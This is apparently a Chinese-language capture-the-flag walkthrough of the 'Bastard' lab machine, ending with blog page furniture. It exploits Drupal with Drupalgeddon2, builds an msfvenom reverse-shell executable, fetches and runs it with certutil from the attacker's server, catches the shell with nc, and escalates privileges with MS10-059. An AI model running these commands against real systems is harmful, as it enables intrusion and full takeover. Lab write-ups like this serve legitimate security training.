Bastard MS10-059

简介

Backdoor

Difficulty Medium

 

实验环境

攻击者 Kali 10.10.16.7

受害者 IP 10.10.10.9  Linux

 

1. 信息收集

收集受害者服务详情

nmap -sV -A 10.10.10.9

80/tcp open http Microsoft IIS httpd 7.5
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC

 

访问80端口

2024-05-16_21-01

 

首先droopscan

droopescan scan drupal -u http://10.10.10.9/

发现目标的版本是7.5.4

2024-05-16_21-03

mv 44449.rb drupalgeddon2.rb
ruby drupalgeddon2.rb http://10.10.10.9/

能拿到一个不完整的shell

2024-05-16_21-07

 

2. 权限提升

从kali上下载reverse的payload

Kali上

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.7 LPORT=443 -f exe>manual.exe
python3 -m http.server 4444

windows下载

certutil.exe -urlcache -f http://10.10.16.7:4444/manual.exe rc.exe

Kali监听443

nc -lvp 443

windows运行反弹shell

rc.exe

能拿到完整shell

2024-05-16_21-10

 

systeminfo

保存到本地的wininfo.txt 然后使用windows-exploit-suggester

/root/anaconda3/envs/python2/bin/python2 windows-exploit-suggester.py --update
/root/anaconda3/envs/python2/bin/python2 windows-exploit-suggester.py --database 2024-05-16-mssb.xlsx --systeminfo /tmp/wininfo.txt

2024-05-16_21-11

2024-05-16_21-12_1

我们可以尝试MS10-059

https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059

 

kali下载 然后windows下载

kali监听 4444端口

windows运行

MS10-059.exe 10.10.16.7 4444

2024-05-16_21-14

权限提升成功

 

 

 

© 版权声明
THE END
喜欢就支持一下吧
点赞12 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片